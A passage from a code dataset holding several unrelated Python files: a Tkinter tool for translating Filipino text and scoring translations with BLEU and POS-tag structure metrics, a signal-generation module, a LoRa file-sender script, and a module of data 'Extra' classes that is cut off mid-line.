ttk.Progressbar(popup, orient='horizontal', mode='indeterminate')\n processing_bar.grid(row=1,column=0)\n \n processing_bar.start(interval=10)\n print(name, 'started')\n func(pytorchFile,tlFile,outputFilename)\n processing_bar.stop()\n print(name, 'stopped')\n \n popup.destroy()\n \n with open(outputFilename + '.txt','r') as file:\n transLines = file.read()\n \n transLines = transLines.replace('', 'unknown')\n \n with open(outputFilename + '.txt','w') as file:\n file.write(transLines)\n \n self.translated_text_area.configure(state='normal')\n self.translated_text_area.delete('1.0',tk.END)\n self.translated_text_area.insert(tk.INSERT, transLines)\n self.translated_text_area.configure(state='disabled')\n \n def run_thread(name, func,pytorchFile,tlFile,outputFilename):\n Thread(target=run_translate_thread, args=(name, func,pytorchFile,tlFile,outputFilename)).start()\n \n def translate_clicked(textwidget,pytorchFile,tlFile): \n outputFilename = AS('File name', 'What would you like to name your output file?') \n \n outputFilename = outputFilename.replace(' ','-')\n if outputFilename == '':\n tk.messagebox.showerror(\"No name entered\", \"No name entered. Please try again.\")\n else:\n \n run_thread('translate', onmtTranslate, pytorchFile,tlFile,outputFilename)\n \n \n #os.system(r'onmt_translate -model ' + pytorchFile + ' -src ' + tlFile + ' -output ' + outputFilename + '.txt -verbose')\n \n \n \n self.button_tab1_Fr = tk.Frame(self.tab1)\n self.button_tab1_Fr.grid(row=2,column=1, pady=20,sticky=tk.E)\n \n self.btn_upload_tab1 = ttk.Button(self.button_tab1_Fr, text = \"Upload\", command=lambda:updTrans(self.text_area))\n self.btn_upload_tab1.grid(row=0,column=2)\n self.btn_translate = ttk.Button(self.button_tab1_Fr, text=\"Translate\", command=lambda: translate_clicked(self.translated_text_area,self.modelPtFile,self.origTlFile))\n self.btn_translate.grid(row=0,column=3)\n self.btn_translate[\"state\"] = tk.DISABLED\n \n # self.btn_vocab = ttk.Button(self.button_tab1_Fr,text=\"Build Vocab\",command=lambda: vocab_clicked(onmtVocab,10000))\n # self.btn_vocab.grid(row = 0, column= 0)\n \n # self.btn_train = ttk.Button(self.button_tab1_Fr, text=\"Train\", command=lambda: train_clicked(onmtTrain))\n # self.btn_train.grid(row=0, column = 1)\n \n def ensure_command():\n time.sleep(99999)\n ##2ND TAB\n ##FOR EVALUATION\n ##STAGE\n ##\n ##\n ##\n \n \n self.tab2 = ttk.Frame(self.tabControl)\n self.tabControl.add(self.tab2, text=\"Evaluation\")\n \n self.nlp = spacy.load('en_core_web_sm')\n \n self.tab2.columnconfigure(0, weight = 2)\n self.tab2.columnconfigure(1, weight = 2)\n self.tab2.columnconfigure(2, weight = 1)\n \n \n \n #graph\n # self.f = Figure(figsize=(3,3),dpi=85)\n \n # a = self.f.add_subplot(111)\n # a.plot([1,2,3,4,5],[0.89,0.56,0.56,0.22,0.17],label=\"bleu Score\")\n # a.plot([1,2,3,4,5],[0.1,0.56,0.43,0.16,0.1],label = \"gross Score\")\n # a.legend()\n # canvas = FigureCanvasTkAgg(self.f,self.tab2)\n # canvas.draw()\n # canvas.get_tk_widget().grid(row=0,column = 1)\n \n ##labels\n \n #self.origLbl = ttk.Label(self.tab2, text = \"Original Text\")\n #self.origLbl.grid(row=1,column=0)\n \n self.reflbl = ttk.Label(self.tab2, text = \"Reference Text\")\n self.reflbl.grid(row=1,column=0)\n \n self.caLbl = ttk.Label(self.tab2, text = \"Candidate Text\")\n self.caLbl.grid(row=1, column=1)\n \n ##text areas\n #self.origTextarea = st.ScrolledText(self.tab2, width = 20, height = 10, font = (\"Times New Roman\", 12))\n #self.origTextarea.grid(row = 2, column = 0, rowspan=4)\n \n self.refTextarea = st.ScrolledText(self.tab2, font = (\"Times New Roman\",7))\n self.refTextarea.grid(row=2,column=0, rowspan=4)\n \n self.calTextarea = st.ScrolledText(self.tab2, font = (\"Times New Roman\",7))\n self.calTextarea.grid(row=2,column=1, rowspan=4)\n \n self.logFr = tk.Frame(self.tab2, height = 317, width = 580)\n self.logFr.grid(row=0, column = 0, sticky=tk.W)\n ##eval data labels\n self.numOfLines = 0\n self.lineCounter = 1\n \n standardtab2LabelFont = 'Times New Roman',11\n self.linesLbl = ttk.Label(self.logFr, text = 'Line ? of ?', font=standardtab2LabelFont)\n self.linesLbl.grid(row = 0, column = 0, sticky=tk.W)\n self.bleu_lbl = ttk.Label(self.logFr, text = 'Standard bleu score: ', font=standardtab2LabelFont)\n self.bleu_lbl.grid(row = 1, column = 0, sticky=tk.W)\n self.avgBleu_lbl = ttk.Label(self.logFr, text = 'Average bleu score so far: ', font=standardtab2LabelFont)\n self.avgBleu_lbl.grid(row = 2, column=0,sticky=tk.W)\n self.gross_lbl = ttk.Label(self.logFr, text = 'Structure sensitive Bleu score: ', font=standardtab2LabelFont)\n self.gross_lbl.grid(row = 3, column = 0, sticky=tk.W)\n self.avgStruct_lbl = ttk.Label(self.logFr,text = 'Average Structure sensitive Bleu score so far: ', font=standardtab2LabelFont)\n self.avgStruct_lbl.grid(row=4,column=0,sticky=tk.W)\n self.corr_lbl = ttk.Label(self.logFr, text = f'Correctly placed POS tags:', font=standardtab2LabelFont)\n self.corr_lbl.grid(row = 5, column= 0, sticky=tk.W )\n self.compare_lbl = ttk.Label(self.logFr, text = f'Number of correctly placed tags:', font=standardtab2LabelFont)\n self.compare_lbl.grid(row = 6, column =0, sticky=tk.W)\n \n \n \n ##button frame\n self.buttonFr = tk.Frame(self.tab2)\n self.buttonFr.grid(row=1,column=2,rowspan=5,sticky=tk.W)\n \n \n \n \n ##choose text file buttons\n self.origLineList = []\n def chooseOrigText(textwidget):\n origDir = fd.askopenfilename()\n origFileName = os.path.split(origDir)[1]\n \n with open(origFileName,'r') as origFileLines:\n for line in origFileLines:\n self.origLineList.append(line)\n \n textwidget.configure(state='normal')\n textwidget.insert(tk.INSERT,self.origLineList[0])\n textwidget.configure(state='disabled')\n \n #self.origBtn = ttk.Button(self.tab2, text=\"Choose Original text file\", command=lambda: chooseOrigText(self.origTextarea))\n #self.origBtn.grid(row=6, column = 0)\n \n self.refLineList = []\n def chooseRefText(textwidget):\n refDir = fd.askopenfilename()\n refFileName = os.path.split(refDir)[1]\n \n with open(refFileName, 'r') as reFileLines:\n for line in reFileLines:\n self.refLineList.append(line)\n \n textwidget.configure(state='normal')\n textwidget.insert(tk.INSERT,self.refLineList[0])\n textwidget.configure(state='disabled')\n \n # self.refBtn = ttk.Button(self.tab2, text=\"Choose Reference text file\", command=lambda: chooseRefText(self.refTextarea))\n # self.refBtn.grid(row=6, column = 1)\n \n self.refFileName = ''\n self.candFileName = ''\n \n self.xCoord = []\n self.xCoordCounter = 1\n self.bleuY = []\n self.grossY = []\n \n self.candLineList = []\n self.correctlyPlacedPOSY = []\n \n def Upload(textwidgets):\n self.refLineList = []\n self.xCoord = []\n self.xCoordCounter = 1\n self.bleuY = []\n self.grossY = []\n self.candLineList = []\n self.lineCounter = 1\n \n tk.messagebox.showinfo(\"Upload file\", \"Select a reference text file\")\n \n refDir = fd.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n self.refFileName = os.path.split(refDir)[1]\n \n with open(self.refFileName, 'r') as reFileLines:\n c = 0\n for line in reFileLines:\n self.refLineList.append(line)\n c+=1\n self.numOfLines = c\n \n textwidgets[0].configure(state='normal')\n textwidgets[0].delete(\"1.0\",\"end\")\n refPOS = str(getPOS(self.nlp(self.refLineList[0])))\n textwidgets[0].insert(tk.INSERT,self.refLineList[0] + \"\\n \" + refPOS)\n textwidgets[0].configure(state='disabled')\n \n tk.messagebox.showinfo(\"Upload file\", \"Select a candidate text file\")\n \n candDir = fd.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n self.candFileName = os.path.split(candDir)[1]\n \n with open(self.candFileName,'r') as candFileLines:\n for line in candFileLines:\n self.candLineList.append(line)\n\n textwidgets[1].configure(state='normal')\n textwidgets[1].delete(\"1.0\",\"end\")\n candPOS = str(getPOS(self.nlp(self.candLineList[0])))\n textwidgets[1].insert(tk.INSERT,self.candLineList[0] + \"\\n \" + candPOS)\n textwidgets[1].configure(state='disabled')\n \n counterLocal = 0\n while counterLocal < len(self.refLineList):\n bleuSc = sentence_bleu(list(self.refLineList[counterLocal]),list(self.candLineList[counterLocal]), weights=(1,0,0,0))\n self.bleuY.append(bleuSc)\n grossSc = structure_evaluation(self.nlp(self.refLineList[counterLocal]),self.nlp(self.candLineList[counterLocal]),bleuSc)\n self.grossY.append(grossSc['grs'])\n self.correctlyPlacedPOSY.append(grossSc['correctly placed tags'])\n self.xCoord.append(self.xCoordCounter)\n self.xCoordCounter+=1\n counterLocal+=1\n \n format_bleuSc = \"{:.2f}\".format(self.bleuY[0])\n format_grossSc = \"{:.2f}\".format(self.grossY[0])\n \n correctlyPOSstr = slicePersonal(self.correctlyPlacedPOSY[0]) \n\n updateEvalLabels(1,str(self.numOfLines),str(format_bleuSc),str(format_bleuSc),str(format_grossSc),str(format_grossSc),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[0]),self.nlp(self.candLineList[0])))\n self.evalBtn[\"state\"] = tk.NORMAL\n self.lastBtn[\"state\"] = tk.NORMAL\n self.prevBtn[\"state\"] = tk.NORMAL\n \n # a = self.f.add_subplot(111)\n # a.plot(self.xCoord, self.bleuY, label = \"bleu Score\")\n # a.plot(self.xCoord, self.grossY, label = \"gross Score\")\n # a.legend()\n \n self.candBtn = ttk.Button(self.buttonFr, text=\"Upload\", command=lambda: Upload([self.refTextarea, self.calTextarea]))\n self.candBtn.grid(row=0, column = 0)\n \n \n \n self.counter = 0\n \n ##eval buttons\n \n def update_line(hl, new_data):\n hl.set_xdata(numpy.append(hl.get_xdata(), new_data))\n hl.set_ydata(numpy.append(hl.get_ydata(), new_data))\n plt.draw()\n \n def prevEval():\n try:\n self.lineCounter-=1\n self.counter-=1\n self.refTextarea.configure(state='normal')\n self.refTextarea.delete('1.0',tk.END)\n refPOS = str(getPOS(self.nlp(self.refLineList[self.counter])))\n self.refTextarea.insert(tk.INSERT,self.refLineList[self.counter] + \"\\n\" + refPOS)\n self.refTextarea.configure(state='disable')\n \n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n candPOS = str(getPOS(self.nlp(self.candLineList[self.counter])))\n self.calTextarea.insert(tk.INSERT,self.candLineList[self.counter] + \"\\n\" + candPOS)\n self.calTextarea.configure(state='disabled')\n \n format_bleuSc = \"{:.2f}\".format(self.bleuY[self.counter])\n avgBleu = \"{:.2f}\".format(sum(self.bleuY[:self.lineCounter])/self.lineCounter) \n \n format_grossSc = \"{:.2f}\".format(self.grossY[self.counter])\n avgStructBleu = \"{:.2f}\".format(sum(self.grossY[:self.lineCounter])/self.lineCounter)\n \n correctlyPOSstr = slicePersonal(self.correctlyPlacedPOSY[self.counter])\n \n \n updateEvalLabels(str(self.lineCounter),str(self.numOfLines),str(format_bleuSc),str(avgBleu),str(format_grossSc),str(avgStructBleu),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[self.counter]),self.nlp(self.candLineList[self.counter])))\n showGraph()\n \n except IndexError:\n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n self.calTextarea.configure(state='disable')\n tk.messagebox.showinfo(\"information\", \"Reached end of text file\")\n \n self.prevBtn = ttk.Button(self.buttonFr, text = \"Previous\", command=lambda: prevEval())\n self.prevBtn[\"state\"] = tk.DISABLED\n self.prevBtn.grid(row=1,column = 0)\n def nextEval():\n try:\n self.lineCounter+=1\n self.counter+=1\n self.refTextarea.configure(state='normal')\n self.refTextarea.delete('1.0',tk.END)\n refPOS = str(getPOS(self.nlp(self.refLineList[self.counter])))\n self.refTextarea.insert(tk.INSERT,self.refLineList[self.counter] + \"\\n\" + refPOS)\n self.refTextarea.configure(state='disable')\n \n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n candPOS = str(getPOS(self.nlp(self.candLineList[self.counter])))\n self.calTextarea.insert(tk.INSERT,self.candLineList[self.counter] + \"\\n\" + candPOS)\n self.calTextarea.configure(state='disabled')\n \n format_bleuSc = \"{:.2f}\".format(self.bleuY[self.counter])\n avgBleu = \"{:.2f}\".format(sum(self.bleuY[:self.lineCounter])/self.lineCounter) \n \n format_grossSc = \"{:.2f}\".format(self.grossY[self.counter])\n avgStructBleu = \"{:.2f}\".format(sum(self.grossY[:self.lineCounter])/self.lineCounter)\n \n correctlyPOSstr = slicePersonal(self.correctlyPlacedPOSY[self.counter])\n \n \n updateEvalLabels(str(self.lineCounter),str(self.numOfLines),str(format_bleuSc),str(avgBleu),str(format_grossSc),str(avgStructBleu),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[self.counter]),self.nlp(self.candLineList[self.counter])))\n showGraph()\n except IndexError:\n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n self.calTextarea.configure(state='disable')\n tk.messagebox.showinfo(\"information\", \"Reached end of text file\")\n \n \n self.evalBtn = ttk.Button(self.buttonFr, text = \"Next\", command=lambda: nextEval())\n self.evalBtn[\"state\"] = tk.DISABLED\n self.evalBtn.grid(row=2,column = 0)\n \n \n def skipLines():\n try:\n lineCounter = 0\n bleuScoresList = []\n structBleuScoresList = []\n \n AvgBleu = 0\n AvgStructBleu = 0\n \n for i in range(len(self.refLineList)):\n bleuSc = sentence_bleu(list(self.refLineList[lineCounter]), list(self.candLineList[lineCounter]), weights=(1, 0, 0, 0))\n bleuScoresList.append(bleuSc)\n grossSc = structure_evaluation(self.nlp(self.refLineList[lineCounter]), self.nlp(self.candLineList[lineCounter]),bleuSc)\n structBleuScoresList.append(grossSc['grs'])\n \n lineCounter+=1\n \n AvgBleu = sum(bleuScoresList)/len(bleuScoresList)\n AvgBleu = \"{:.2f}\".format(AvgBleu)\n AvgStructBleu = sum(structBleuScoresList)/len(structBleuScoresList)\n AvgStructBleu = \"{:.2f}\".format(AvgStructBleu)\n \n tk.messagebox.showinfo(\"Averages\", f\"Bleu: {AvgBleu} \\nStructure Sensitive Bleu: {AvgStructBleu}\")\n except FileNotFoundError:\n tk.messagebox.showerror(\"Error\",\"No files uploaded\") \n \n #self.skipBtn = ttk.Button(self.buttonFr, text = \"Show average\", command=lambda: skipLines())\n #self.skipBtn.grid(row=2,column=0)\n \n def skipToLast():\n self.lineCounter = len(self.refLineList)\n self.counter = self.lineCounter - 1\n #Should counter also update? \n self.refTextarea.configure(state='normal')\n self.refTextarea.delete('1.0',tk.END)\n refPOS = str(getPOS(self.nlp(self.refLineList[-1])))\n self.refTextarea.insert(tk.INSERT,self.refLineList[-1] + \"\\n\" + refPOS)\n self.refTextarea.configure(state='disable')\n \n self.calTextarea.configure(state='normal')\n self.calTextarea.delete('1.0',tk.END)\n candPOS = str(getPOS(self.nlp(self.candLineList[-1])))\n self.calTextarea.insert(tk.INSERT,self.candLineList[-1] + \"\\n\" + candPOS)\n self.calTextarea.configure(state='disabled')\n \n bleuSc = sentence_bleu(list(self.refLineList[-1]), list(self.candLineList[-1]), weights=(1, 0, 0, 0))\n format_bleuSc = \"{:.2f}\".format(bleuSc)\n \n avgBleu = \"{:.2f}\".format(sum(self.bleuY)/len(self.bleuY)) \n \n grossSc = structure_evaluation(self.nlp(self.refLineList[-1]), self.nlp(self.candLineList[-1]),bleuSc)\n format_grossSc = \"{:.2f}\".format(grossSc['grs'])\n \n \n avgStructBleu = \"{:.2f}\".format(sum(self.grossY)/len(self.grossY))\n \n \n correctlyPOSstr = slicePersonal(grossSc['correctly placed tags'])\n \n updateEvalLabels(str(self.numOfLines),str(self.numOfLines),str(format_bleuSc),str(avgBleu),str(format_grossSc),str(avgStructBleu),correctlyPOSstr,compare_POS(self.nlp(self.refLineList[-1]),self.nlp(self.candLineList[-1])))\n showGraph()\n \n self.lastBtn = ttk.Button(self.buttonFr, text=\"Skip to Last\", command = lambda: skipToLast())\n self.lastBtn[\"state\"] = tk.DISABLED\n self.lastBtn.grid(row=3,column=0)\n \n \n ##self.reftxt = ttk.Label(self.tab2, text = self.ref_being_evaluated)\n ##self.reftxt.place(relx=0.5, rely=0.5,anchor='center')\n \n def updateEvalLabels(line_number,total_lines,std_bleu_score,avg_std_bleu,struct_bleu_score,avg_struct_bleu,correct_lbls,compared_lbls):\n self.linesLbl[\"text\"] = f\"Line {line_number} of {total_lines}\"\n self.bleu_lbl[\"text\"] = f\"Standard bleu score: {std_bleu_score}\"\n self.avgBleu_lbl[\"text\"] = f\"Average bleu score so far: {avg_std_bleu}\"\n self.gross_lbl[\"text\"] = f\"Structure sensitive Bleu score: {struct_bleu_score}\"\n self.avgStruct_lbl[\"text\"] = f\"Average Structure sensitive Bleu score so far: {avg_struct_bleu}\"\n self.corr_lbl[\"text\"] = f\"Correctly placed POS tags: {correct_lbls}\"\n self.compare_lbl[\"text\"] = f\"Number of correctly placed tags: {compared_lbls}\"\n \n \n def showGraph():\n f = Figure(figsize=(3,3),dpi=85)\n a = f.add_subplot(111)\n a.plot(self.xCoord[:self.lineCounter], self.bleuY[:self.lineCounter], label = \"bleu Score\")\n a.plot(self.xCoord[:self.lineCounter], self.grossY[:self.lineCounter], label = \"SS Bleu Score\")\n a.legend()\n \n canvas = FigureCanvasTkAgg(f,self.tab2)\n canvas.draw()\n canvas.get_tk_widget().grid(row=0,column = 1)\n \n \n \n self.tabControl.pack(expand=1, fill=\"both\")\n \n \n ##3rd tab\n ##For instructions\n ##\n ##\n ##\n \n self.tab3 = ttk.Frame(self.tabControl)\n self.tabControl.add(self.tab3, text=\"Instructions\")\n \n standardtab3LblFont = 'Times New Roman', 12\n \n remindLbl = ttk.Label(self.tab3, text = 'Reminder: Make sure that a translated text file and reference text file are both already present', font = standardtab3LblFont)\n remindLbl.grid(row = 0, column = 0, sticky=tk.W)\n \n remindLbl2 = ttk.Label(self.tab3, text = ' before proceeding to the evaluation phase', font = standardtab3LblFont)\n remindLbl2.grid(row = 1, column = 0, sticky=tk.W)\n \n transInstructionLbl = ttk.Label(self.tab3, text = 'Translation phase', font = standardtab3LblFont)\n transInstructionLbl.grid(row = 2, column = 0, sticky=tk.W)\n \n step1Lbl = ttk.Label(self.tab3, text = 'Step 1: Click the translate button', font = standardtab3LblFont)\n step1Lbl.grid(row = 3, column = 0, sticky=tk.W)\n \n step2Lbl = ttk.Label(self.tab3, text = 'Step 2: You will be prompted to select a model. Only .pt (PyTorch) files are accepted', font = standardtab3LblFont)\n step2Lbl.grid(row = 4, column = 0, sticky=tk.W)\n \n step3Lbl = ttk.Label(self.tab3, text = 'Step 3: Next, select an input text file. The file should be in Filipino language. Only .txt files are accepted', font = standardtab3LblFont)\n step3Lbl.grid(row = 5, column = 0, sticky=tk.W)\n \n step4Lbl = ttk.Label(self.tab3, text = 'Step 4: Enter the name of the output file', font = standardtab3LblFont)\n step4Lbl.grid(row = 6, column = 0, sticky=tk.W)\n \n spaceLbl = ttk.Label(self.tab3, text = ' ')\n spaceLbl.grid(row = 7, column = 0, sticky = tk.W)\n \n evalInstructionLbl = ttk.Label(self.tab3, text = 'Evaluation phase', font = standardtab3LblFont)\n evalInstructionLbl.grid(row = 8, column = 0, sticky = tk.W)\n \n stepE1Lbl = ttk.Label(self.tab3, text = 'Step 1: Click the upload button', font = standardtab3LblFont)\n stepE1Lbl.grid(row = 9, column = 0, sticky = tk.W)\n \n stepE2Lbl = ttk.Label(self.tab3, text = 'Step 2: Select the reference text file. Only .txt files are accepted', font = standardtab3LblFont)\n stepE2Lbl.grid(row = 10, column = 0, sticky = tk.W)\n \n stepE3Lbl = ttk.Label(self.tab3, text = 'Step 3: Select the candidate text file. Only .txt files are accepted', font = standardtab3LblFont)\n stepE3Lbl.grid(row = 11, column = 0, sticky = tk.W)\n \n stepE4Lbl = ttk.Label(self.tab3, text = 'Step 4: The scores along with other information are now displayed. Click the next button to \\nevaluate the next line until the end of the text file', font = standardtab3LblFont)\n stepE4Lbl.grid(row = 12, column = 0, sticky = tk.W)\n \n ##4th tab\n ##POS tags list\n \n self.tab4 = ttk.Frame(self.tabControl)\n self.tabControl.add(self.tab4, text=\"POS labels\")\n \n self.posLabelFr = tk.Frame(self.tab4)\n self.posLabelFr.grid(row=0,column=0,padx=20,pady=20)\n \n posHeaderLbl = ttk.Label(self.posLabelFr, text = 'POS', font = standardtab3LblFont)\n posHeaderLbl.grid(row = 0, column = 0)\n \n descHeaderLbl = ttk.Label(self.posLabelFr,text = 'DESCRIPTION', font = standardtab3LblFont)\n descHeaderLbl.grid(row=0,column=1)\n \n exHeaderLbl = ttk.Label(self.posLabelFr,text = 'EXAMPLES', font = standardtab3LblFont)\n exHeaderLbl.grid(row=0,column=2)\n \n tags_list = ['ADJ','ADP','ADV','AUX','CONJ','CCONJ','DET','INTJ','NOUN','NUM','PART','PRON','PROPN','PUNCT','SCONJ','SYM','VERB','X','SPACE']\n desc_list = ['adjective','adposition','adverb','auxiliary','conjunction','coordinating conjunction','determiner','interjection','noun','numeral','particle','pronoun','proper noun','punctuation','subordinating conjunction','symbol','verb','other','space']\n examples_list = ['*big, old, green','*in, to, during*','*very, where, there*'\n ,'\t*is, has (done), will (do), should (do)*','\t*and, or, but*','*and, or, but*','*a, an, the*','*psst, ouch, bravo, hello*','\t*girl, cat, tree, air, beauty*','*1, 2017, one, seventy-seven, IV, MMXIV*'\n ,'*’s, not,*','\t*I, you, he, she, myself, themselves, somebody*','\t*Mary, John, London, NATO, HBO*','\t*., (, ), ?*','*if, while, that*','*$, %, §, ©, +, −*','\t*run, runs, running, eat, ate, eating*'\n ,'*sfpksdpsxmsa*',''\n ]\n\n tags_rows = []\n desc_rows = []\n examples_rows = []\n \n tags_counter=0\n tags_rowcount=1\n for i in tags_list:\n tags_rows.append(ttk.Label(self.posLabelFr, text=i, font = standardtab3LblFont))\n tags_rows[tags_counter].grid(row=tags_rowcount,column=0)\n tags_counter+=1\n tags_rowcount+=1\n \n desc_counter=0\n desc_rowcount=1\n for i in desc_list:\n desc_rows.append(ttk.Label(self.posLabelFr, text=i, font = standardtab3LblFont))\n desc_rows[desc_counter].grid(row=desc_rowcount,column=1)\n desc_counter+=1\n desc_rowcount+=1\n \n examples_counter=0\n examples_rowcount=1\n for i in examples_list:\n examples_rows.append(ttk.Label(self.posLabelFr, text=i, font = standardtab3LblFont))\n examples_rows[examples_counter].grid(row=examples_rowcount,column=2)\n examples_counter+=1\n examples_rowcount+=1\n \n self.root.mainloop()\n \n \n \n \n \n \n \n# root = tk.Tk()\n# root.geometry('300x200')\n# tabControl = ttk.Notebook(root)\n\n# tab1 = ttk.Frame(tabControl)\n# tab2 = ttk.Frame(tabControl)\n\n# tabControl.add(tab1, text ='Tab 1')\n# tabControl.add(tab2, text ='Tab 2')\n# tabControl.pack(expand = 1, fill =\"both\")\n\n# ttk.Label(tab1, \n# text =\"Welcome to \\\n# GeeksForGeeks\").grid(column = 0, \n# row = 0,\n# padx = 30,\n# pady = 30) \n \n# root.mainloop() \n\ndisplay = Display()\n","repo_name":"Chimeratech-py/trytkinter","sub_path":"trytkinter.py","file_name":"trytkinter.py","file_ext":"py","file_size_in_byte":41267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10019406503","text":"import numpy as np\n\nclass signals:\n class Sine:\n def __init__(self, freq, amplitude=1.0, phase=0):\n self.freq = freq\n self.amplitude = amplitude\n self.phase = phase\n\n def apply(self, sbuf, make_even=True):\n f = self.freq\n\n if make_even:\n f = sbuf.round_freq(f)\n \n sbuf.array = self.amplitude * np.exp(1j * (-2.0 * np.pi * f.hz * sbuf.t + self.phase)) \n\n class ZadoffChu:\n def __init__(self, N, q, u):\n self.N = N\n self.q = q\n self.u = u\n\n def apply(self, sbuf, nrepeat=1):\n cf = self.N % 2\n n = np.arange(self.N)\n\n wform = np.exp(-1.0j * np.pi * self.u * n * (n + cf + 2 * self.q) / self.N)\n\n if nrepeat == -1:\n nrepeat = sbuf.nsamples // N\n \n sbuf.array = np.concatenate((np.tile(wform, nrepeat), np.zeros(sbuf.nsamples - nrepeat * len(wform))))\n \n","repo_name":"pi-radio/piradiod","sub_path":"piradio/jupyter/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43146126982","text":"import pycom\n\nfrom AlLoRa.Nodes.Source import Source\nfrom AlLoRa.Connectors.LoPy4_connector import LoPy4_connector\nfrom AlLoRa.File import CTP_File\nfrom time import sleep\n\n# For testing\nsizes = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]\t#, 1024\nfile_counter = 0\n\ndef clean_timing_file():\n\ttest_log = open('log.txt', \"wb\")\n\ttest_log.write(\"\")\n\ttest_log.close()\n\n\nif __name__ == \"__main__\":\n\n\t# First, we set the connector (basyc LoRa-LoPy connection to access to the LoPy's LoRa libraries)\n\tconnector = LoPy4_connector()\n\n\t# Then, we set up out Sender Node\n\tlora_node = Source(connector, config_file = \"LoRa.json\")\n\n\t# We turn on a led for a second to know that we are doing ok...\n\tpycom.rgbled(0x1aa7ec) \t# Picton Blue\n\tsleep(1)\n\tpycom.rgbled(0) \t\t# off\n\n\tchunk_size = lora_node.get_chunk_size()\t\t# We use it to create the files to be sent...\n\n\ttry:\n\t\tclean_timing_file()\n\t\tbackup = lora_node.establish_connection()\n\t\tprint(\"Connected!\")\n\n\t\t# This is how to handle a backup file if needed (not implemented in this example...)\n\t\tif backup:\n\t\t\tprint(\"Asking backup\")\n\t\t\t#file = Datasource.get_backup()\n\t\t\t#lora_node.restore_file(file)\n\n\t\t# with an established connection, we start sending data periodically\n\t\twhile True:\n\t\t\tif not lora_node.got_file():\n\t\t\t\tn = file_counter % len(sizes)\n\t\t\t\tfile_counter += 1\n\t\t\t\tsize = sizes[n]\n\t\t\t\tprint(\"Setting file\")\n\t\t\t\tpycom.rgbled(0xd74894)\t\t\t\t\t\t\t# Kirby Pink.\n\n\t\t\t\tfile = CTP_File(name = '{}.json'.format(size),\n\t\t\t\t\t\t\t\tcontent = bytearray('{}'.format(n%10)*(1024 * size)),\n\t\t\t\t\t\t\t\tchunk_size=chunk_size)\n\t\t\t\tlora_node.set_file(file)\n\n\t\t\t\tprint(\"New file set, \", file.get_name())\n\t\t\t\tpycom.rgbled(0)\t\t\t\t\t\t\t\t\t# LED off\n\n\t\t\tlora_node.send_file()\n\n\texcept KeyboardInterrupt as e:\n\t\tprint(\"THREAD_EXIT\")\n","repo_name":"SMARTLAGOON/AlLoRa","sub_path":"examples/LoPySender/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"914014748","text":"import csv\nimport six\n\nclass Extra(object):\n \"\"\"\n Base class for things which can be stored in the IVM apart from data sets.\n\n Essentially the only thing an Extra needs to be able to do is be written\n out as a string by implementing __str__\n\n Alternatively an Extra can override the serialize() method which allows\n formatting options to be taken account of.\n\n We also provide a metadata dictionary - ideally extras should write their\n metadata in __str__ but in practice this may not be possible when we want\n the output to be compatible with external programs (e.g. writing out a\n matrix as TSV)\n\n In the future we might expand the Extra base class to define other behaviours,\n e.g. flexible saving to an output file, alternative capabilities... But we\n want to keep things simple for now while we figure out what use can\n be made of them.\n\n Currently the main uses for Extras are:\n\n - Tabular output, e.g. data statistics which we might want to write out to a file\n - Matrix outputs, e.g. affine transformations which are the output of a registration\n \"\"\"\n def __init__(self, name):\n self.name = name\n self.metadata = {}\n\n def serialize(self, f, **format):\n text = str(self)\n f.write(text)\n\nclass NumberListExtra(Extra):\n \"\"\"\n Extra which represents a list of numbers\n \"\"\"\n def __init__(self, name, values):\n \"\"\"\n :param name: Extra name\n :param values: Sequence of numeric values\n \"\"\"\n Extra.__init__(self, name)\n\n # Check all values are numeric\n [float(v) for v in values]\n self.values = values\n\n def serialize(self, f, **format):\n sep = format.get(\"sep\", \" \")\n f.write(sep.join([str(v) for v in self.values]))\n\nclass MatrixExtra(Extra):\n \"\"\"\n Extra which represents a 2D matrix with optional row and column headers\n \"\"\"\n def __init__(self, name, arr, row_headers=(), col_headers=()):\n \"\"\"\n :param name: Extra name\n :param arr: List-of-lists or 2D Numpy array containing matrix data\n :param row_headers: Optional sequence of row headers\n :param col_headers: Optional sequence of column headers\n \"\"\"\n Extra.__init__(self, name)\n if len(arr) == 0:\n raise ValueError(\"No matrix data given\")\n if row_headers and len(row_headers) != len(arr):\n raise ValueError(\"Incorrect number of row headers given\")\n if col_headers and len(col_headers) != len(arr[0]):\n raise ValueError(\"Incorrect number of column headers given\")\n\n self.arr = arr\n self.row_headers = list(row_headers)\n self.col_headers = list(col_headers)\n\n def __str__(self):\n \"\"\"\n Convert matrix to a string in TSV format\n \"\"\"\n stream = six.StringIO()\n writer = csv.writer(stream, delimiter='\\t', lineterminator='\\n')\n if self.col_headers:\n if self.row_headers:\n writer.writerow([\" \"] + self.col_headers)\n else:\n writer.writerow(self.col_headers)\n\n for row in self.arr:\n if self.row_headers:\n writer.writerow([\" \"] + list(row))\n else:\n writer.writerow(list(row))\n\n return stream.getvalue()\n\nclass DataFrameExtra(Extra):\n \"\"\"\n Extra which represents a Pandas data frame\n\n This is useful for representing general tabular data.\n \"\"\"\n def __init__(self, name, df):\n \"\"\"\n :param name: Extra name\n :param arr: List-of-lists or 2D Numpy array containing matrix data\n :param row_headers: Optional sequence of row headers\n :param col_headers: Optional sequence of column headers\n \"\"\"\n Extra.__init__(self, name)\n self.df = df\n\n def __str__(self):\n stream = six.StringIO()\n self.df.to_csv(stream, sep='\\t')\n return 